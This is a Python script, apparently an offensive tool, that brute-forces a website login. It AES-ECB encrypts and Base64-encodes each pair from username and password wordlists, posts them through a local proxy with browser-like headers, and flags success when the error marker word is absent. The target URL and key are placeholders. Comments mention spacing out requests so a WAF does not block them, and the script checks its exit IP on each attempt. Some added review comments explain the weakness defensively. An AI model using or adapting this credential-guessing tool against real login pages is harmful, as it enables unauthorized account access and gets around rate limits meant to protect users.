| from cryptography.fernet import Fernet import requests import time import base64 from Crypto.Cipher import AES from Crypto.Util.Padding import pad import json
# Delay between requests, so that the WAF does not block the client
# sleep = time.sleep(20)
# Proxy map handed to requests: both schemes are routed through the same
# local listener on port 7890.
proxies = dict.fromkeys(('http', 'https'), 'http://localhost:7890')

# Static, browser-like header set sent with every request made by this script.
# From a detection standpoint this is a fixed fingerprint: the same header
# block repeats unchanged across every login attempt.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/123.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Sec-Gpc": "1",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Te": "trailers",
    "Connection": "close",
}
def setPost(username, password):
    """Build the form fields sent in the login POST.

    Each value is wrapped as ``(None, value)``; ``getRequest`` passes the
    result to ``requests.post(files=...)``, so the two fields travel as
    multipart parts without a filename.

    Args:
        username: value placed in the ``user.userid`` field.
        password: value placed in the ``user.userpassword`` field.

    Returns:
        dict mapping the two field names to ``(None, value)`` tuples.
    """
    return {
        "user.userid": (None, username),
        "user.userpassword": (None, password),
    }
def input_usernameData():
    """Read ``./username.txt`` and return its lines as a list of usernames.

    Only newline characters are stripped from each line; other whitespace and
    empty lines are kept as entries. The number of entries is printed.

    Returns:
        list of str, one per line of the file.
    """
    # NOTE(review): "utf=8" looks like a typo for "utf-8"; left unchanged here.
    with open(r"./username.txt", encoding="utf=8") as handle:
        names = [line.strip("\n") for line in handle.readlines()]
    print("[+] 装载用户名字典,数量:{}".format(len(names)))
    return names
def input_passwordData():
    """Read ``./password.txt`` and return its lines as a list of passwords.

    Only newline characters are stripped from each line; other whitespace and
    empty lines are kept as entries. The number of entries is printed.

    Returns:
        list of str, one per line of the file.
    """
    # NOTE(review): "utf=8" looks like a typo for "utf-8"; left unchanged here.
    with open(r"./password.txt", encoding="utf=8") as handle:
        candidates = [line.strip("\n") for line in handle.readlines()]
    print("[+] 装载密码字典,数量:{}".format(len(candidates)))
    return candidates
def getRequest(data):
    """POST one set of login form fields and classify the response.

    The request goes out with the module-level ``headers`` and ``proxies``.
    The status code, body length and full body are printed.

    Args:
        data: multipart field mapping as produced by ``setPost``.

    Returns:
        1 if the response body contains the marker word "错误" ("error"),
        otherwise 0.
    """
    # Placeholder left by the author: the login endpoint is not filled in.
    url = "填写网站登录后台地址"
    print("[+] 爆破目标:{}".format(url))
    respond = requests.post(url=url, files=data, headers=headers, proxies=proxies)
    print("[+] http.status: {},http.length: {}".format(respond.status_code, len(respond.content)))
    body = respond.text
    print(body)
    # Marker word the script expects in a failed-login response.
    return 1 if "错误" in body else 0
def aesCrypto(userList,passwordList):
    """Encrypt every username/password pair with AES-ECB and submit it.

    For each username, and for each password under it, both values are
    UTF-8 encoded, padded to the AES block size, encrypted with a single
    ECB cipher object, and Base64-encoded before being handed to
    ``setPost`` and ``getRequest``.

    NOTE(review): ECB under a fixed key is deterministic, so equal plaintext
    always gives equal ciphertext. Encrypting form fields with a key that the
    client holds therefore does not limit credential guessing; server-side
    throttling, account lockout and MFA are the controls that do.

    Args:
        userList: iterable of username strings.
        passwordList: iterable of password strings.

    Returns:
        None. Progress and results are printed.
    """
    # AES key (placeholder left by the author, not a usable key)
    key = b"填写aes密钥"
    # key = key.encode('utf-8')
    print("[+] 读取aes密钥:{}".format(key))

    # One ECB cipher object is reused for every username and password.
    cipher = AES.new(key,AES.MODE_ECB)
    for u in userList:
        # From here on `u` is bytes, not the original str.
        u = u.encode('utf-8')
        # Encrypt: pad to the block size, encrypt, then Base64-encode.
        userData = pad(u,AES.block_size)
        encryted_username = cipher.encrypt(userData)
        base64_encryted_username = base64.b64encode(encryted_username).decode('utf-8')
        for p in passwordList:
            # From here on `p` is bytes, not the original str.
            p = p.encode('utf-8')
            passwordData = pad(p,AES.block_size)
            encryted_password = cipher.encrypt(passwordData)
            base64_encryted_password = base64.b64encode(encryted_password).decode('utf-8')
            # One extra request to httpbin.org is made per attempt to print the reported IP.
            IP = whatIP()
            print("--------------------------")
            print("[+] 当前出口IP:{}".format(IP))
            print("[+] payload用户名:{},payload密码:{}".format(base64_encryted_username,base64_encryted_password))
            dealFiles = setPost(base64_encryted_username,base64_encryted_password)
            # print("[+] POST载荷{}".format(dealFiles))
            result = getRequest(dealFiles)
            if result == 1:
                # getRequest saw the failure marker in the response body.
                print("[+] 密码错误……\n--------------------------\n")
                # Sleep time between attempts
                # time.sleep(sleep)
                time.sleep(5)
            else:
                # `u` and `p` are bytes here, so they are printed as bytes reprs.
                print("\033[0;34m【+】\033[0m"+" 爆破成功!\n用户名:{},密码:{}".format(u,p))
                # Leaves the password loop only; the username loop continues.
                break
def whatIP():
    """Return the caller's IP address as reported by ``https://httpbin.org/ip``.

    The request is sent with the module-level ``headers``; the JSON body is
    parsed and its ``origin`` field is returned.

    Returns:
        The value of the ``origin`` key in the response JSON.
    """
    reply = requests.get(url="https://httpbin.org/ip", headers=headers)
    parsed = json.loads(reply.text)
    return parsed["origin"]
if __name__ == "__main__":
    # Script entry point: load the username list, then the password list,
    # and pass both to the encrypt-and-submit loop.
    print("AES password blasting启动中……")
    aesCrypto(input_usernameData(), input_passwordData())
    print("[+] running over~")